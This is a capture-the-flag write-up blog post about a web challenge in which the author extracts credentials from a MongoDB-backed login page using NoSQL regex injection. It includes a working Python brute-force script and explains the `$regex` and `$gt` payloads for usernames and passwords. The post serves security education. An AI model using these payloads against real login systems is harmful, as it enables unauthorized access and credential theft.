<!DOCTYPE html><html lang="en"><head>
    
      <title>
        Hackplayers Conference 2020 Final CTF Writeup ::
        jorgectf — blog
      </title>
    
    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta name="description" content="Hackplayers Conference Qualifiers CTF Wrietup."/>
<meta name="keywords" content=""/>
<meta name="robots" content="noodp"/>
<link rel="canonical" href="https://jorgectf.github.io/blog/post/h-con-final-writeup/"/>





<link rel="stylesheet" href="https://jorgectf.github.io/blog/assets/style.css"/>

<link rel="stylesheet" href="https://jorgectf.github.io/blog/style.css"/>


<link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://jorgectf.github.io/blog/img/apple-touch-icon-144-precomposed.png"/>
<link rel="shortcut icon" href="https://jorgectf.github.io/blog/img/favicon.png"/>


<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-Italic.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-Regular.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-Medium.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-MediumItalic.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-Bold.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>
<link href="https://jorgectf.github.io/blog/assets/fonts/Inter-BoldItalic.woff2" rel="preload" type="font/woff2" as="font" crossorigin=""/>


<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Hackplayers Conference 2020 Final CTF Writeup"/>
<meta name="twitter:description" content="Hackplayers Conference Qualifiers CTF Wrietup."/>



<meta property="og:title" content="Hackplayers Conference 2020 Final CTF Writeup"/>
<meta property="og:description" content="Hackplayers Conference Qualifiers CTF Wrietup."/>
<meta property="og:type" content="article"/>
<meta property="og:url" content="https://jorgectf.github.io/blog/post/h-con-final-writeup/"/><meta property="article:section" content="post"/>
<meta property="article:published_time" content="2019-11-20T13:55:00+00:00"/>
<meta property="article:modified_time" content="2019-11-20T13:55:00+00:00"/><meta property="og:site_name" content="jorgectf"/>







  </head>
  <body class="dark-theme">
    <div class="container">
      <header class="header">
  <span class="header__inner">
    <a href="https://jorgectf.github.io/blog/" class="logo" style="text-decoration: none;">
  
  <img src="https://jorgectf.github.io/blog/logo.png" alt="jorgectf"/>
  
</a>
    <span class="header__right">
      
        <nav class="menu">
  <ul class="menu__inner menu__inner--desktop">
    
    
    
    <li><a href="https://jorgectf.gitbook.io/awae-oswe-preparation-resources/">OSWE Cheatsheet</a></li>
    
    
    
    <li><a href="https://jorgectf.github.io/blog/research/">Research</a></li>
    
    
    <li><a href="../">About</a></li>
    
    
  </ul>

  <ul class="menu__inner menu__inner--mobile">
    
    
    <li><a href="https://jorgectf.gitbook.io/awae-oswe-preparation-resources/">OSWE Cheatsheet</a></li>
    
    
    
    <li><a href="https://jorgectf.github.io/blog/research/">Research</a></li>
    
    
    <li><a href="../">About</a></li>
  </ul>
</nav>
        <span class="menu-trigger">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
            <path d="M0 0h24v24H0z" fill="none"></path>
            <path d="M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z"></path>
          </svg>
        </span>
      
      <span class="theme-toggle">
        <svg class="theme-toggler" width="24" height="24" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg">
  <path d="M22 41C32.4934 41 41 32.4934 41 22C41 11.5066 32.4934 3 22
  3C11.5066 3 3 11.5066 3 22C3 32.4934 11.5066 41 22 41ZM7 22C7
  13.7157 13.7157 7 22 7V37C13.7157 37 7 30.2843 7 22Z"></path>
</svg>

      </span>
    </span>
  </span>
</header>


      <div class="content">
        
  
  

  <div class="post">
    <h1 class="post-title">Hackplayers Conference 2020 Final CTF Writeup</h1>
    <div class="post-meta">
      
        <span class="post-date">
          2019-11-20
        </span>

        
          
        
      

      


      
    </div>

    
      <span class="post-tags">
        
          <a href="https://jorgectf.github.io/blog/tags/h-con/">#h-con</a> 
        
          <a href="https://jorgectf.github.io/blog/tags/ctf/">#ctf</a> 
        
          <a href="https://jorgectf.github.io/blog/tags/web/">#web</a> 
        
          <a href="https://jorgectf.github.io/blog/tags/mongodb/">#mongodb</a> 
        
      </span>
    

    

    <div class="post-content">
      
      <p>Hi everyone, in this post I will be covering one of both of the challenges we (Team Yorcheto) managed to solve in the final round of <a href="https://www.h-c0n.com/p/home.html" target="_blank">h-con</a> CTF.</p>
<p>Let’s begin! :P</p>
<h1 id="web-challenge">Web Challenge</h1>
<p>This challenge was the initial access to a box called LaTierra, a linux box which contained some challenges related to Steganography, Reversing, etc.</p>
<h3 id="quick-reminder-wait-from-2-to-5-minutes-until-scanning-the-whole-target-including--p--in-nmap-so-you-wont-have-the-problem-i-had">Quick reminder: Wait from 2 to 5 minutes until scanning the whole target (including -p- in nmap) so you won’t have the problem I had.</h3>
<p>This web challenge was based on a website with a login page that required a username inside “uname” and a password inside “upass” GET parameters. When we first approached the challenge, we tended to try vulnerabilities related to php (like type juggling) but had no success.</p>
<p>After requesting two hints for this challenge, the second one drove us to a TCP port (the hint was “27017 TCP”) and I inmediately thought that my full scan with nmap took that port closed because the service hadn’t been deployed yet. So then we had an open port with a Mongo Database running on it.</p>
<p>With that information, we would think that the login page was working along with the mongo database to check for credentials, so I quickly remembered a box from HTB (can’t say the name because it hasn’t been retired yet) based on a NOSQL injection leading to credential obtainance thanks to the possibility to use regular expressions to match our input with the database.</p>
<h2 id="code">Code:</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python"><span style="color:#f92672">import</span> requests
<span style="color:#f92672">import</span> urllib3
<span style="color:#f92672">import</span> string
<span style="color:#f92672">import</span> urllib
urllib3<span style="color:#f92672">.</span>disable_warnings()

username<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;&#39;</span>
password<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;&#39;</span>
u<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;http://IP/&#39;</span>
headers <span style="color:#f92672">=</span> {<span style="color:#e6db74">&#39;Content-Type&#39;</span>: <span style="color:#e6db74">&#39;application/x-www-form-urlencoded&#39;</span>}

usuarios <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;Gohan&#34;</span>, <span style="color:#e6db74">&#34;Kakarot&#34;</span>]
passes <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;ieatyourbrain&#34;</span>, <span style="color:#e6db74">&#34;93ab40353300ef91ba2e1bca7fba5d67&#34;</span>]

<span style="color:#66d9ef">with</span> requests<span style="color:#f92672">.</span>Session() <span style="color:#66d9ef">as</span> s:

    <span style="color:#66d9ef">while</span> <span style="color:#66d9ef">True</span>:
      <span style="color:#66d9ef">for</span> c <span style="color:#f92672">in</span> string<span style="color:#f92672">.</span>printable:
        <span style="color:#66d9ef">if</span> c <span style="color:#f92672">in</span> [<span style="color:#e6db74">&#39;*&#39;</span>,<span style="color:#e6db74">&#39;+&#39;</span>,<span style="color:#e6db74">&#39;.&#39;</span>,<span style="color:#e6db74">&#39;?&#39;</span>,<span style="color:#e6db74">&#39;|&#39;</span>,<span style="color:#e6db74">&#39;&amp;&#39;</span>, <span style="color:#e6db74">&#39;$&#39;</span>, <span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">&#39;</span>]:
          c <span style="color:#f92672">=</span> <span style="color:#e6db74">&#39;</span><span style="color:#ae81ff">\\</span><span style="color:#e6db74">&#39;</span> <span style="color:#f92672">+</span> c
          payload<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;uname[$regex]=^</span><span style="color:#e6db74">%s</span><span style="color:#e6db74">&amp;upass[$gt]=&amp;login=login&#39;</span> <span style="color:#f92672">%</span> (username <span style="color:#f92672">+</span> c)
          <span style="color:#75715e">#payload=&#39;uname=Kakarot&amp;upass[$regex]=^%s&amp;login=login&#39; % (username + c)</span>

          
          r <span style="color:#f92672">=</span> s<span style="color:#f92672">.</span>post(u, data <span style="color:#f92672">=</span> payload, headers <span style="color:#f92672">=</span> headers, verify <span style="color:#f92672">=</span> <span style="color:#66d9ef">False</span>, allow_redirects <span style="color:#f92672">=</span> <span style="color:#66d9ef">False</span>)

          <span style="color:#66d9ef">if</span> r<span style="color:#f92672">.</span>status_code <span style="color:#f92672">==</span> <span style="color:#ae81ff">302</span> <span style="color:#f92672">and</span> (username<span style="color:#f92672">+</span>c)[<span style="color:#ae81ff">0</span>] <span style="color:#f92672">!=</span> <span style="color:#e6db74">&#34;G&#34;</span> <span style="color:#f92672">and</span> (username<span style="color:#f92672">+</span>c)[<span style="color:#ae81ff">0</span>] <span style="color:#f92672">!=</span> <span style="color:#e6db74">&#34;K&#34;</span>:
            print(<span style="color:#e6db74">&#34;Found one more char : </span><span style="color:#e6db74">%s</span><span style="color:#e6db74">&#34;</span> <span style="color:#f92672">%</span> (username<span style="color:#f92672">+</span>c))
            username <span style="color:#f92672">+=</span> c
</code></pre></div><h5 id="edit-changed-from-not-using-characters-like--to-using-them-by-escaping-with----and-not-getting-any-errors-thanks-jarihttpstwittercom_laox">Edit: Changed from not using characters like “*,+,.” to using them by escaping with “\ \ &#34; and not getting any errors. (¡Thanks <a href="https://twitter.com/_laox" target="_blank">Jari</a>!)</h5>
<p>The thing is, we iterate over all of the printable chracters and this way the usernames and passwords can be obtained.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python">payload<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;uname[$regex]=^</span><span style="color:#e6db74">%s</span><span style="color:#e6db74">&amp;upass[$gt]=&amp;login=login&#39;</span> <span style="color:#f92672">%</span> (username <span style="color:#f92672">+</span> c)
</code></pre></div><p>With this payload, the use of regex is declared (because php working in the backend treats our username field as an array and declares it contains a regex payload) and the match character (^) is used. This way, if the username is “pepe”, the script will be asking the database wheter the username starts with a, b, c, d,… When it gets to p, a 302 response is received which means the regex is true. Then, the script will be asking whether the username starts with “px” where x is the letter of the iteration, so “pe” would deliver a 302 response.</p>
<p>The parameter given to the password (kind of “bypass” it), as it returns true everytime. (You could now think that parameter could be used for both of the GET parameters, but our goal is to obtain credentials, not to bypass the login process.)</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-python" data-lang="python">payload<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;uname=Kakarot&amp;upass[$regex]=^</span><span style="color:#e6db74">%s</span><span style="color:#e6db74">&amp;login=login&#39;</span> <span style="color:#f92672">%</span> (username <span style="color:#f92672">+</span> c)
</code></pre></div><p>This second payload does the same as the first one but treats the password as a regular expression. This way, passwords are being bruteforced with a valid username.</p>
<h1 id="conclusion">Conclusion</h1>
<p>The second challenge was about reversing and my amazing teammates (<a href="https://twitter.com/sisoma2" target="_blank">sisoma2</a> and <a href="https://twitter.com/naivenom" target="_blank">Naivenom</a>) managed to solve it (Send them some funny stickers and they will surely tell you about it :P)</p>
<p><img src="https://jorgectf.github.io/blog/static/hcon2020/final.jpg" alt=""/></p>
<p>Thanks for reading :)</p>

    </div>
    
      
        <div class="pagination">
          <div class="pagination__title">
            <span class="pagination__title-h">Read other posts</span>
            <hr/>
          </div>
          <div class="pagination__buttons">
            
              <span class="button previous">
                <a href="https://jorgectf.github.io/blog/post/nahamconctf-2021-agenttester/">
                  <span class="button__icon">←</span>
                  <span class="button__text">NahamCon 2021 CTF&#39;s AgentTester solver</span>
                </a>
              </span>
            
            
              <span class="button next">
                <a href="https://jorgectf.github.io/blog/post/h-con-writeup/">
                  <span class="button__text">Hackplayers Conference 2020 Qualifiers CTF Writeup</span>
                  <span class="button__icon">→</span>
                </a>
              </span>
            
          </div>
        </div>
      
    

    
      
        

<script src="https://unpkg.com/shiki"></script>

<script>
    if (document.querySelector("code[data-lang*='ql']")) {
        shiki
            .getHighlighter({
                theme: 'github-dark',
                langs: [
                    {
                        id: 'codeql',
                        scopeName: 'source.ql',
                        path: '/languages/codeql.tmLanguage.json',
                        samplePath: 'codeql.sample',
                        aliases: ['ql']
                    }
                ]
            })
            .then(highlighter => {
                for (codeElement of document.querySelectorAll("code[data-lang]")) {
                    try {
                        let prev = codeElement.textContent
                        let code = highlighter.codeToHtml(prev, { lang: codeElement.dataset.lang.toString() })
                        codeElement.parentNode.innerHTML = code
                    } catch(err) {
                        console.log(err)
                    }
                }
                for (shikiElement of document.querySelectorAll("pre[class='shiki']")) {
                    shikiElement.parentNode.parentNode.replaceChild(
                        shikiElement, shikiElement.parentNode
                    )
                }
            })
    }
</script>
      
    
  </div>

      </div>

      
        <footer class="footer">
  <div class="footer__inner">
    
      <a href="https://jorgectf.github.io/blog/" class="logo" style="text-decoration: none;">
  
  <img src="https://jorgectf.github.io/blog/logo.png" alt="jorgectf"/>
  
</a>
      <div class="copyright">
        <span>© 2021 Powered by
          <a href="https://gohugo.io" target="_blank" rel="noopener">Hugo</a></span>
        <span>Theme created by
          <a href="https://twitter.com/panr" target="_blank" rel="noopener">panr</a></span>
      </div>
    
  </div>
</footer>

<script src="https://jorgectf.github.io/blog/assets/main.js"></script>


      
    </div>

    
  

</body></html>